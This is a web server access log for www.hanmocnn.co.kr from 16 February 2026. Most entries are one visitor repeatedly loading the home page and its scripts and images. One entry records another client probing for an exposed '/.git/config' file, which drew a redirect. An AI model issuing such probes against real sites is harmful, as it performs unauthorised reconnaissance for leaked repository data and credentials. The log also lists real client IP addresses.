"/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:06:11:56 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:06:11:56 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 18046] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:06:11:56 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 4450] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:06:11:57 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:06:15:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10028] [Gzip 5.06] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:06:15:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:06:15:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:06:15:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:06:15:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:06:15:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:06:15:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 4450] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:06:15:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 18158] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:06:15:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:06:15:42 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10028] [Gzip 5.06] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:06:15:42 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:06:15:42 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:06:15:42 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:06:15:42 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:06:15:42 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:06:15:42 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 18157] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:06:15:42 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 4450] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:06:15:42 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:06:16:48 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10028] [Gzip 5.06] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:06:16:48 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:06:16:48 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:06:16:48 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:06:16:48 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:06:16:48 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:06:16:48 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 18056] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:06:16:48 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 4450] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:06:16:49 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:06:18:46 +0000] - - 301 - GET http www.hanmocnn.co.kr "/.git/config" [Client 173.212.204.156] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" -[16/Feb/2026:06:21:20 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10028] [Gzip 5.06] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:06:21:20 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:06:21:20 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:06:21:20 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:06:21:20 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:06:21:20 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:06:21:20 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 18084] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:06:21:20 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 4450] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:06:21:20 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:06:21:28 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10028] [Gzip 5.06] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:06:21:28 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:06:21:28 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:06:21:28 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:06:21:28 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:06:21:28 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:06:21:28 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 18084] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:06:21:28 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 4450] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:06:21:29 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:06:22:35 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10028] [Gzip 5.06] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:06:22:35 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:06:22:35 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:06:22:35 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:06:22:35 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:06:22:35 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:06:22:35 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 18095] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:06:22:35 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 4450] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:06:22:36 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:06:30:54 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10028] [Gzip 5.06] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:06:30:54 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:06:30:54 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:06:30:54 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:06:30:54 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:06:30:54 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:06:30:54 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 18085] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:06:30:54 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 4450] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:06:30:55 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:06:31:22 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10028] [Gzip 5.06] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:06:31:22 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:06:31:22 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:06:31:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:06:31:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:06:31:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:06:31:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 18077] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:06:31:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 4450] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:06:31:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 